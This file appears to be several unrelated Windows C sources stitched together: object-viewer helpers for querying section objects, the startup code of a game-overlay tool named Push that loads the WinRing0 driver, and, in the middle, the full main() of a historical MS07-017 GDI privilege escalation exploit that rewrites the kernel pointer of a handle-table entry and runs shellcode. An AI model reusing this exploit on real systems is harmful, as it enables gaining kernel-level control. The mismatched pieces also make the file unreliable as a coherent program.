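/*
* propFormatSectionAttributes
*
* Purpose:
*
* Render the SEC_* allocation attribute flags of a section as a " + " separated
* list of names (e.g. "File + Image") into Buffer. Buffer is zeroed first, so an
* empty string results when no known flag is set. cbBuffer is the size in bytes.
*
*/
static VOID propFormatSectionAttributes(
    _In_ ULONG AllocationAttributes,
    _Inout_ LPWSTR Buffer,
    _In_ SIZE_T cbBuffer
)
{
    // Order of this table is the display order.
    static const struct {
        ULONG Flag;
        LPWSTR Name;
    } attrNames[] = {
        { SEC_BASED,       TEXT("Based") },
        { SEC_NO_CHANGE,   TEXT("NoChange") },
        { SEC_FILE,        TEXT("File") },
        { SEC_IMAGE,       TEXT("Image") },
        { SEC_RESERVE,     TEXT("Reserve") },
        { SEC_COMMIT,      TEXT("Commit") },
        { SEC_NOCACHE,     TEXT("NoCache") },
        { SEC_GLOBAL,      TEXT("Global") },
        { SEC_LARGE_PAGES, TEXT("LargePages") }
    };
    SIZE_T i;
    BOOL bSet = FALSE;

    RtlSecureZeroMemory(Buffer, cbBuffer);

    for (i = 0; i < sizeof(attrNames) / sizeof(attrNames[0]); i++) {
        if ((AllocationAttributes & attrNames[i].Flag) == 0)
            continue;
        if (bSet)
            _strcat(Buffer, TEXT(" + "));
        _strcat(Buffer, attrNames[i].Name);
        bSet = TRUE;
    }
}

/*
* propSetDlgItemHex64
*
* Purpose:
*
* Set a dialog item text to Value formatted as 0x-prefixed upper case hex.
* Takes an explicit 64-bit value so the %I64X format matches the argument
* regardless of the width of SIZE_T / ULONG_PTR on the build.
*
*/
static VOID propSetDlgItemHex64(
    _In_ HWND hwndDlg,
    _In_ INT nIDDlgItem,
    _In_ ULONGLONG Value
)
{
    WCHAR szBuffer[32];

    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    wsprintf(szBuffer, TEXT("0x%I64X"), Value);
    SetDlgItemText(hwndDlg, nIDDlgItem, szBuffer);
}

/*
* propGetImageSubsystemName
*
* Purpose:
*
* Return display name for an IMAGE_SUBSYSTEM_* value, "Unknown" otherwise.
*
*/
static LPWSTR propGetImageSubsystemName(
    _In_ ULONG SubSystemType
)
{
    switch (SubSystemType) {
    case IMAGE_SUBSYSTEM_NATIVE:
        return TEXT("Native");
    case IMAGE_SUBSYSTEM_WINDOWS_GUI:
        return TEXT("Windows GUI");
    case IMAGE_SUBSYSTEM_WINDOWS_CUI:
        return TEXT("Windows Console");
    case IMAGE_SUBSYSTEM_OS2_CUI:
        return TEXT("OS/2 Console");
    case IMAGE_SUBSYSTEM_POSIX_CUI:
        return TEXT("Posix Console");
    case IMAGE_SUBSYSTEM_XBOX:
        return TEXT("XBox");
    case IMAGE_SUBSYSTEM_EFI_APPLICATION:
        return TEXT("EFI Application");
    case IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER:
        return TEXT("EFI Boot Service Driver");
    case IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER:
        return TEXT("EFI Runtime Driver");
    case IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION:
        return TEXT("Windows Boot Application");
    default:
        return TEXT("Unknown");
    }
}

/*
* propShowImageInformation
*
* Purpose:
*
* Reveal the image info controls and fill them from SECTION_IMAGE_INFORMATION
* (entry point, stack sizes, executable flag, subsystem and its version).
*
*/
static VOID propShowImageInformation(
    _In_ HWND hwndDlg,
    _In_ SECTION_IMAGE_INFORMATION *ImageInfo
)
{
    RECT rGB;
    WCHAR szBuffer[MAX_PATH];

    //show hidden controls
    if (GetWindowRect(GetDlgItem(hwndDlg, ID_IMAGEINFO), &rGB)) {
        EnumChildWindows(hwndDlg, supEnumEnableChildWindows, (LPARAM)&rGB);
    }

    //Entry
    propSetDlgItemHex64(hwndDlg, ID_IMAGE_ENTRY, (ULONGLONG)(ULONG_PTR)ImageInfo->TransferAddress);

    //Stack Reserve
    propSetDlgItemHex64(hwndDlg, ID_IMAGE_STACKRESERVE, (ULONGLONG)ImageInfo->MaximumStackSize);

    //Stack Commit
    propSetDlgItemHex64(hwndDlg, ID_IMAGE_STACKCOMMIT, (ULONGLONG)ImageInfo->CommittedStackSize);

    //Executable
    SetDlgItemText(hwndDlg, ID_IMAGE_EXECUTABLE,
        (ImageInfo->ImageContainsCode) ? TEXT("Yes") : TEXT("No"));

    //Subsystem
    SetDlgItemText(hwndDlg, ID_IMAGE_SUBSYSTEM,
        propGetImageSubsystemName(ImageInfo->SubSystemType));

    //Major Version
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    ultostr(ImageInfo->SubSystemMajorVersion, szBuffer);
    SetDlgItemText(hwndDlg, ID_IMAGE_MJV, szBuffer);

    //Minor Version
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    ultostr(ImageInfo->SubSystemMinorVersion, szBuffer);
    SetDlgItemText(hwndDlg, ID_IMAGE_MNV, szBuffer);
}

/*
* propBasicQuerySection
*
* Purpose:
*
* Set information values for Section object type.
*
* Opens the current object with SECTION_QUERY, shows allocation attributes and
* maximum size; for file-backed image sections (SEC_IMAGE | SEC_FILE) also shows
* the image information controls.
*
* If ExtendedInfoAvailable is FALSE then it calls propSetDefaultInfo to set Basic page properties.
*
*/
VOID propBasicQuerySection(
    _In_ PROP_OBJECT_INFO *Context,
    _In_ HWND hwndDlg,
    _In_ BOOL ExtendedInfoAvailable
)
{
    NTSTATUS status;
    HANDLE hObject = NULL;
    SIZE_T bytesNeeded = 0;
    WCHAR szBuffer[MAX_PATH * 2];
    SECTION_BASIC_INFORMATION sbi;
    SECTION_IMAGE_INFORMATION sii;

    // Defaults that stay in place when the queries below fail.
    SetDlgItemText(hwndDlg, ID_SECTION_ATTR, T_CannotQuery);
    SetDlgItemText(hwndDlg, ID_SECTIONSIZE, T_CannotQuery);

    if (Context == NULL) {
        return;
    }

    //
    // Open Section object.
    //
    if (!propOpenCurrentObject(Context, &hObject, SECTION_QUERY)) {
        return;
    }

    //this is for specific mars warning, mars doesn't recognize __stosb intrinsics
    szBuffer[0] = 0;

    //query basic information
    RtlSecureZeroMemory(&sbi, sizeof(sbi));
    status = NtQuerySection(hObject,
        SectionBasicInformation,
        &sbi,
        sizeof(sbi),
        &bytesNeeded);

    if (NT_SUCCESS(status)) {

        propFormatSectionAttributes(sbi.AllocationAttributes, szBuffer, sizeof(szBuffer));
        SetDlgItemText(hwndDlg, ID_SECTION_ATTR, szBuffer);

        //Size
        propSetDlgItemHex64(hwndDlg, ID_SECTIONSIZE, (ULONGLONG)sbi.MaximumSize.QuadPart);

        //query image information, only meaningful for file-backed image sections
        if ((sbi.AllocationAttributes & SEC_IMAGE) &&
            (sbi.AllocationAttributes & SEC_FILE))
        {
            RtlSecureZeroMemory(&sii, sizeof(sii));
            status = NtQuerySection(hObject,
                SectionImageInformation,
                &sii,
                sizeof(sii),
                &bytesNeeded);

            if (NT_SUCCESS(status)) {
                propShowImageInformation(hwndDlg, &sii);
            }
        }
    }

    //
    // Query object basic and type info if needed.
    //
    if (ExtendedInfoAvailable == FALSE) {
        propSetDefaultInfo(Context, hwndDlg, hObject);
    }

    NtClose(hObject);
}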
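/*
* PushSetKeyboardHookType
*
* Map the KeyboardHookType setting string to a KEYBOARD_HOOK_* value on the
* shared memory block. Unknown values fall back to KEYBOARD_HOOK_AUTO.
*/
static void PushSetKeyboardHookType(wchar_t *value)
{
    if (String_Compare(value, L"AUTO") == 0) {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_AUTO;
    } else if (String_Compare(value, L"SUBCLASS") == 0) {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_SUBCLASS;
    } else if (String_Compare(value, L"MESSAGE") == 0) {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_MESSAGE;
    } else if (String_Compare(value, L"KEYBOARD") == 0) {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_KEYBOARD;
    } else if (String_Compare(value, L"DETOURS") == 0) {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_DETOURS;
    } else if (String_Compare(value, L"RAW") == 0) {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_RAW;
    } else {
        PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_AUTO;
    }
}

/*
* PushLoadSettings
*
* Read PUSH_SETTINGS_FILE into PushSharedMemory and PushOverlayInterface.
* The file must be UTF-16LE (BOM 0xFEFF); otherwise a message box is shown and
* the defaults set by the caller stay in effect. The caller has already checked
* that the file exists.
*
* NOTE(review): the ini is addressed as ".\" + PUSH_SETTINGS_FILE, i.e. relative
* to the current directory of the process, not to the executable's directory.
*/
static void PushLoadSettings(void)
{
    wchar_t *iniPath = L".\\" PUSH_SETTINGS_FILE;
    wchar_t *buffer;
    wchar_t marker = 0;

    // Check if file is UTF-16LE by looking at the byte order mark.
    buffer = (WCHAR*) File_Load(PUSH_SETTINGS_FILE, NULL);
    if (!buffer) {
        Log(L"Could not read settings file");
        return;
    }
    marker = buffer[0];
    Memory_Free(buffer);

    if (marker != 0xFEFF) {
        MessageBoxW(
            NULL,
            L"Settings file not UTF-16LE! "
            L"Resave the file as \"Unicode\" or Push won't read it!",
            L"Bad Settings file",
            MB_OK
            );
        return;
    }

    // Init settings from ini file.
    buffer = Memory_Allocate(100 * sizeof(WCHAR));
    if (!buffer) {
        Log(L"Could not allocate settings buffer");
        return;
    }

    Ini_GetString(L"Settings", L"FrameLimit", NULL, buffer, 5, iniPath);
    PushSharedMemory->FrameLimit = _wtoi(buffer);

    if (Ini_ReadBoolean(L"Settings", L"ThreadOptimization", FALSE, iniPath))
        PushSharedMemory->ThreadOptimization = TRUE;

    if (Ini_ReadBoolean(L"Settings", L"KeepFps", FALSE, iniPath))
        PushSharedMemory->KeepFps = TRUE;

    Ini_GetString(L"Settings", L"OverlayInterface", NULL, buffer, 5, iniPath);
    if (String_Compare(buffer, L"PURE") == 0)
        PushOverlayInterface = OVERLAY_INTERFACE_PURE;
    else if (String_Compare(buffer, L"RTSS") == 0)
        PushOverlayInterface = OVERLAY_INTERFACE_RTSS;

    Ini_GetString(L"Settings", L"KeyboardHookType", L"AUTO", buffer, 10, iniPath);
    PushSetKeyboardHookType(buffer);

    Ini_GetString(L"Settings", L"EngineClockMax", NULL, buffer, 5, iniPath);
    PushSharedMemory->HarwareInformation.DisplayDevice.EngineOverclock = _wtoi(buffer);

    Ini_GetString(L"Settings", L"MemoryClockMax", NULL, buffer, 5, iniPath);
    PushSharedMemory->HarwareInformation.DisplayDevice.MemoryOverclock = _wtoi(buffer);

    Ini_GetString(L"Settings", L"ControllerTimeout", NULL, buffer, 5, iniPath);
    PushSharedMemory->ControllerTimeout = _wtoi(buffer);

    Ini_GetString(L"Settings", L"FontName", L"Verdana", buffer, 100, iniPath);
    String_Copy(PushSharedMemory->FontName, buffer);

    Memory_Free(buffer);

    if (Ini_ReadBoolean(L"Settings", L"FontBold", FALSE, iniPath))
        PushSharedMemory->FontBold = TRUE;
}

/*
* start
*
* Process entry point: enforce a single instance, create the shared section
* used by the overlay, load settings, start the driver (or fall back to a
* user-mode hook), spawn the monitor and pipe threads and run the message loop.
* Never returns normally; exits via ExitProcess.
*/
INT32 __stdcall start(void)
{
    HANDLE sectionHandle;
    HANDLE hMutex;
    HANDLE eventHandle;
    HANDLE threadHandle;
    DWORD sectionSize;
    MSG messages;
    OBJECT_ATTRIBUTES objAttrib = {0};
    PTEB threadEnvironmentBlock;
    UNICODE_STRING eventSource;
    LDR_DATA_TABLE_ENTRY *module;
    SECTION_BASIC_INFORMATION sectionInfo;
    LARGE_INTEGER newSectionSize;
    NTSTATUS status;

    InitializeCRT();

    threadEnvironmentBlock = NtCurrentTeb();

    PushProcessId = threadEnvironmentBlock->ClientId.UniqueProcess;
    PushHeapHandle = threadEnvironmentBlock->ProcessEnvironmentBlock->ProcessHeap;
    PushSessionId = threadEnvironmentBlock->ProcessEnvironmentBlock->SessionId;

    // Check if already running. LastErrorValue in the TEB is what GetLastError()
    // returns. The mutex handle is intentionally kept open for the lifetime of
    // the process: it is the instance lock.
    hMutex = CreateMutexW(0, FALSE, L"PushOneInstance");

    if (threadEnvironmentBlock->LastErrorValue == ERROR_ALREADY_EXISTS
        || threadEnvironmentBlock->LastErrorValue == ERROR_ACCESS_DENIED)
    {
        MessageBoxW(0, L"Only one instance!", 0,0);
        ExitProcess(0);
    }
    (void)hMutex;

    //create image event
    eventHandle = NULL;

    UnicodeString_Init(&eventSource, L"Global\\" PUSH_IMAGE_EVENT_NAME);

    objAttrib.Length = sizeof(OBJECT_ATTRIBUTES);
    objAttrib.RootDirectory = BaseGetNamedObjectDirectory();
    objAttrib.ObjectName = &eventSource;
    objAttrib.Attributes = OBJ_OPENIF;
    objAttrib.SecurityDescriptor = NULL;
    objAttrib.SecurityQualityOfService = NULL;

    status = NtCreateEvent(&eventHandle, EVENT_ALL_ACCESS, &objAttrib, NotificationEvent, FALSE);
    if (!NT_SUCCESS(status)) {
        Log(L"Could not create image event");
    }

    // populate file name and path from the first entry of the loader list
    // (the executable itself). FullDllName.Length is in bytes, so the
    // terminator goes after Length / sizeof(WCHAR) characters.
    // NOTE(review): PushFilePath is declared elsewhere; confirm it is large
    // enough for a full path.
    module = (LDR_DATA_TABLE_ENTRY*)threadEnvironmentBlock->ProcessEnvironmentBlock->Ldr->InLoadOrderModuleList.Flink;
    Memory_Copy(PushFilePath, module->FullDllName.Buffer, module->FullDllName.Length);
    PushFilePath[module->FullDllName.Length / sizeof(WCHAR)] = L'\0';

    // Start Driver. On failure the user-mode paths below are used instead.
    Driver_Extract();
    PushDriverLoaded = Driver_Load();

    //initialize instance
    PushInstance = Module_GetHandle(L"Push.exe");

    // Create interface
    MwCreateMainWindow();

    // Create section.
    sectionSize = sizeof(PUSH_SHARED_MEMORY) + OSD_GetSize();
    PushSharedMemory = (PUSH_SHARED_MEMORY*)Memory_MapViewOfSection(PUSH_SECTION_NAME, sectionSize, &sectionHandle);

    if (!PushSharedMemory) {
        Log(L"Could not create shared memory");
        return 0;
    }

    Log(L"Created section of size %i bytes", sectionSize);

    //zero struct
    Memory_Clear(PushSharedMemory, sizeof(PUSH_SHARED_MEMORY));

    //initialize window handle used by overlay
    //PushSharedMemory->WindowHandle = PushMainWindow->Handle;

    //initialize default font properties for overlay
    String_Copy(PushSharedMemory->FontName, L"Verdana");
    PushSharedMemory->FontBold = TRUE;

    if (File_Exists(PUSH_SETTINGS_FILE)) {
        PushLoadSettings();
    }

    if (!PushDriverLoaded) {
        wchar_t driverPath[260];

        // NOTE(review): WinRing0 is a third-party kernel driver exposing
        // hardware access to user mode; confirm the bundled build is not on
        // the Microsoft vulnerable-driver blocklist before shipping it.
        Resource_Extract(L"DRIVERALT", L"WinRing0x64.sys");
        GetDriverPath(L"WinRing0x64.sys", driverPath);
        Wr0DriverLoaded = Wr0Initialize(driverPath);
    }

    //initialize HWInfo
    GetHardwareInfo();

    //initialize OSD items and verify the section can hold them
    status = NtQuerySection(
        sectionHandle,
        SectionBasicInformation,
        &sectionInfo,
        sizeof(SECTION_BASIC_INFORMATION),
        NULL
        );

    newSectionSize.QuadPart = OSD_Initialize() + sizeof(PUSH_SHARED_MEMORY);

    if (!NT_SUCCESS(status)) {
        // sectionInfo is uninitialized on failure, so the size check is skipped.
        Log(L"Could not query shared memory section");
    } else if (newSectionSize.QuadPart > sectionInfo.MaximumSize.QuadPart) {
        Log(L"Shared memory too small!");
    }

    //Check for controllers/gamepads/bluetooth adapters
    //EnumerateDevices();

    // Check for running games
    Process_EnumProcesses(ProcessEnum);

    // Activate process monitoring
    if (PushDriverLoaded) {
        PushToggleProcessMonitoring(TRUE);
    } else {
        HANDLE overlayLib = NULL;
        void* prcAddress = 0;

        // NOTE(review): the library is loaded by bare file name after being
        // extracted, so resolution follows the DLL search order; loading the
        // extracted file by its full path would pin it to the intended copy.
        Resource_Extract(L"OVERLAY32", PUSH_LIB_NAME_32);
        overlayLib = Module_Load(L"overlay32.dll");
        prcAddress = Module_GetProcedureAddress(overlayLib, "InstallOverlayHook");

        if (prcAddress) {
            InstallOverlayHook = (TYPE_InstallOverlayHook)prcAddress;
            InstallOverlayHook();
        }
    }

    // NOTE(review): purpose of this single terminator write is not clear from here.
    g_szPrevGame[5] = '\0';

    NtCreateThreadEx(
        &PushMonitorThreadHandle,
        THREAD_ALL_ACCESS,
        NULL,
        NtCurrentProcess(),
        &MonitorThread,
        NULL,
        NoThreadFlags,
        0, 0, 0,
        NULL
        );

    NtCreateThreadEx(
        &threadHandle,
        THREAD_ALL_ACCESS,
        NULL,
        NtCurrentProcess(),
        &PipeThread,
        NULL,
        NoThreadFlags,
        0, 0, 0,
        NULL
        );

    // Handle messages
    while(GetMessageW(&messages, 0,0,0)) {
        TranslateMessage(&messages);
        DispatchMessageW(&messages);
    }

    ExitProcess(0);

    return 0;
}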
/*
 * main
 *
 * Historical local privilege escalation proof of concept for the GDI issue the
 * banner below names as MS07-017. Kept as an analysis artifact only: it
 * hard-codes a 32-bit kernel base and a win32k offset, so it is tied to one
 * specific Windows build and prints pointers with %x, which is only well
 * defined where pointers are 32 bits wide. Depends on Shellcode, buff,
 * GetWin32kBase and GDITableEntry, which are defined elsewhere in this file.
 */
int main(int argc, char* argv[])
{
    ULONG i, PID, Status, Old;
    LPVOID lpMapAddress=NULL;
    HANDLE hMapFile=(HANDLE)0x10;
    GDITableEntry *gdiTable;
    SECTION_BASIC_INFORMATION SBI;
    WORD Upr;
    ULONG Size=0x1000;
    PVOID Addr=(PVOID)0x2;

    printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n" "http://ivanlef0u.free.fr\n" "Be MAD!\n");

    //allocate memory at addresse 0x2
    // A failure here is only printed; the memcpy below writes through Addr regardless.
    Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
    if(Status)
        printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
    else
        printf("Addr : 0x%x OKAY\n", Addr);

    memcpy(Addr, Shellcode, sizeof(Shellcode));

    printf("win32.sys base : 0x%x\n", GetWin32kBase());
    // Build-specific constant; valid only for the win32k.sys this was written against.
    ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
    printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc

    HBRUSH hBr;
    hBr=CreateSolidBrush(0);
    Upr=(WORD)((DWORD)hBr>>16);
    printf("0x%x\n", Upr);

    // Walks handle values upward until MapViewOfFile succeeds. There is no upper
    // bound, so the loop never terminates if no mappable handle exists.
    while(!lpMapAddress)
    {
        hMapFile=(HANDLE)((ULONG)hMapFile+1);
        lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    }

    // Unreachable: the loop above only exits with a non-NULL mapping.
    if(lpMapAddress==NULL)
    {
        printf("Error with MapViewOfFile : %d\n", GetLastError());
        return 0;
    }

    Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
    if (Status) //!=STATUS_SUCCESS (0)
    {
        printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status);
        return 0;
    }

    // Size.QuadPart is 64-bit but is printed with %x and compared against a ULONG below.
    printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);

    gdiTable=(GDITableEntry *)lpMapAddress;
    PID=GetCurrentProcessId();

    // Scans the mapped table for this process's entry. If no entry matches,
    // gdiTable ends one past the table and Old stays uninitialized; the later
    // "restore old value" write then goes out of bounds with an undefined value.
    for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
    {
        if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
        {
            printf("gdiTable : 0x%x\n", gdiTable);
            printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
            printf("ProcessID : %d\n", gdiTable->ProcessID);
            printf("_nCount : %d\n", gdiTable->_nCount);
            printf("nUpper : 0x%x\n", gdiTable->nUpper);
            printf("nType : 0x%x\n", gdiTable->nType );
            printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);

            Old=gdiTable->pKernelInfo;
            gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
            break;
        }
        gdiTable++;
    }

    if(!DeleteObject(hBr))
        printf("Error with DeleteObject : %d\n", GetLastError());
    else
        printf("Done\n");

    printf("Buff : 0x%x\n", buff);
    memset(buff, 0x90, sizeof(buff));
    buff[0]=0x1; //!=0
    buff[0x24/4]=Win32kSST; //syscall to modifY
    buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr

    if(!DeleteObject(hBr))
        printf("Error with DeleteObject : %d\n", GetLastError());

    gdiTable->pKernelInfo=Old; //restore old value

    /*
    lkd> uf GDI32!NtGdiAbortDoc
    GDI32!NtGdiAbortDoc:
    77f3073a b800100000 mov eax,1000h
    77f3073f ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
    77f30744 ff12 call dword ptr [edx]
    77f30746 c20400 ret 4
    */
    // Inline x86 assembly: MSVC-only, 32-bit only.
    __asm
    {
        mov eax, 0x1000
        mov edx,0x7ffe0300
        call dword ptr [edx]
    }

    return 0;
}
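/*
* supQueryFileDescription
*
* Purpose:
*
* Read the FileDescription string from the version resource of lpszFileName
* into Buffer (ccBuffer chars). Uses the first translation entry of the
* version block for language/codepage. Returns TRUE on success.
*
*/
static BOOL supQueryFileDescription(
    _In_ LPCWSTR lpszFileName,
    _Inout_ LPWSTR Buffer,
    _In_ DWORD ccBuffer
)
{
    BOOL bResult = FALSE;
    PVOID vinfo = NULL;
    LPTRANSLATE lpTranslate = NULL;
    LPWSTR pcValue = NULL;
    DWORD dwHandle = 0, dwSize, dwInfoSize = 0;
    WCHAR szQueryBlock[MAX_PATH];

    do {
        // query size of version info
        dwSize = GetFileVersionInfoSize(lpszFileName, &dwHandle);
        if (dwSize == 0)
            break;

        // allocate memory for version_info structure
        vinfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize);
        if (vinfo == NULL)
            break;

        // query it from file
        if (!GetFileVersionInfo(lpszFileName, 0, dwSize, vinfo))
            break;

        // query codepage and language id info; dwInfoSize is in bytes here and
        // must cover at least one translation entry before lpTranslate[0] is read
        if (!VerQueryValue(vinfo, VERSION_TRANSLATION, (LPVOID *)&lpTranslate, (PUINT)&dwInfoSize))
            break;
        if (lpTranslate == NULL || dwInfoSize < sizeof(*lpTranslate))
            break;

        // query filedescription from file with given codepage & language id
        RtlSecureZeroMemory(szQueryBlock, sizeof(szQueryBlock));
        wsprintf(szQueryBlock, VERSION_DESCRIPTION, lpTranslate[0].wLanguage, lpTranslate[0].wCodePage);

        // finally query pointer to version_info filedescription block data
        dwInfoSize = 0;
        bResult = VerQueryValue(vinfo, szQueryBlock, (LPVOID *)&pcValue, (PUINT)&dwInfoSize);
        if (bResult && pcValue != NULL) {
            _strncpy(Buffer, ccBuffer, pcValue, dwInfoSize);
        }

    } while (FALSE);

    if (vinfo)
        HeapFree(GetProcessHeap(), 0, vinfo);

    return bResult;
}

/*
* supQuerySectionFileInfo
*
* Purpose:
*
* Query section object type File + Image description from version info block.
*
* Opens the named section, confirms it is SEC_IMAGE | SEC_FILE, picks the
* KnownDlls directory matching the image machine type, and reads the
* FileDescription of the backing file into Buffer.
*
* ObjectName is a counted UNICODE_STRING: its Buffer is not required to be
* NUL-terminated, so the name is copied by Length rather than scanned.
*
* Returns TRUE if Buffer was filled.
*
*/
BOOL supQuerySectionFileInfo(
    _In_opt_ HANDLE hRootDirectory,
    _In_ PUNICODE_STRING ObjectName,
    _Inout_ LPWSTR Buffer,
    _In_ DWORD ccBuffer //size of buffer in chars
)
{
    HANDLE hSection = NULL;
    LPWSTR lpszFileName = NULL, lpszKnownDlls = NULL;
    SIZE_T cLength = 0, cchKnownDlls, cchObjectName, i;
    NTSTATUS status;
    BOOL bResult = FALSE;
    OBJECT_ATTRIBUTES Obja;
    SECTION_BASIC_INFORMATION sbi;
    SECTION_IMAGE_INFORMATION sii;
    WCHAR szSystemDirectory[MAX_PATH];

    if (
        (ObjectName == NULL) ||
        (ObjectName->Buffer == NULL) ||
        (ObjectName->Length == 0) ||
        (Buffer == NULL) ||
        (ccBuffer == 0)
        )
    {
        return bResult;
    }

    do {
        //oleaut32.dll does not have FileDescription

        // open section with query access
        InitializeObjectAttributes(&Obja, ObjectName, OBJ_CASE_INSENSITIVE, hRootDirectory, NULL);
        status = NtOpenSection(&hSection, SECTION_QUERY, &Obja);
        if (!NT_SUCCESS(status))
            break;

        // query section flags
        RtlSecureZeroMemory(&sbi, sizeof(sbi));
        status = NtQuerySection(hSection, SectionBasicInformation, (PVOID)&sbi, sizeof(sbi), &cLength);
        if (!NT_SUCCESS(status))
            break;

        // check if section is SEC_IMAGE | SEC_FILE
        if (!((sbi.AllocationAttributes & SEC_IMAGE) && (sbi.AllocationAttributes & SEC_FILE)))
            break;

        // check image machine type
        RtlSecureZeroMemory(&sii, sizeof(sii));
        status = NtQuerySection(hSection, SectionImageInformation, (PVOID)&sii, sizeof(sii), &cLength);
        if (!NT_SUCCESS(status))
            break;

        // select proper decoded KnownDlls path
        if (sii.Machine == IMAGE_FILE_MACHINE_I386) {
            lpszKnownDlls = g_lpKnownDlls32;
        }
        else if (sii.Machine == IMAGE_FILE_MACHINE_AMD64) {
            lpszKnownDlls = g_lpKnownDlls64;
        }

        // paranoid: fall back to the system directory
        if (lpszKnownDlls == NULL) {
            RtlSecureZeroMemory(szSystemDirectory, sizeof(szSystemDirectory));
            if (GetSystemDirectory(szSystemDirectory, MAX_PATH) == 0)
                break;
            lpszKnownDlls = szSystemDirectory;
        }

        // allocate memory buffer to store full filename
        // KnownDlls + \\ + Object->Name + \0
        cchKnownDlls = _strlen(lpszKnownDlls);
        cchObjectName = ObjectName->Length / sizeof(WCHAR);
        cLength = (cchKnownDlls + 1 + cchObjectName + 1) * sizeof(WCHAR);

        lpszFileName = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cLength);
        if (lpszFileName == NULL)
            break;

        // construct target filepath; HEAP_ZERO_MEMORY supplies the terminator
        _strcpy(lpszFileName, lpszKnownDlls);
        lpszFileName[cchKnownDlls] = L'\\';
        for (i = 0; i < cchObjectName; i++) {
            lpszFileName[cchKnownDlls + 1 + i] = ObjectName->Buffer[i];
        }

        bResult = supQueryFileDescription(lpszFileName, Buffer, ccBuffer);

    } while (FALSE);

    if (hSection)
        NtClose(hSection);

    if (lpszFileName)
        HeapFree(GetProcessHeap(), 0, lpszFileName);

    return bResult;
}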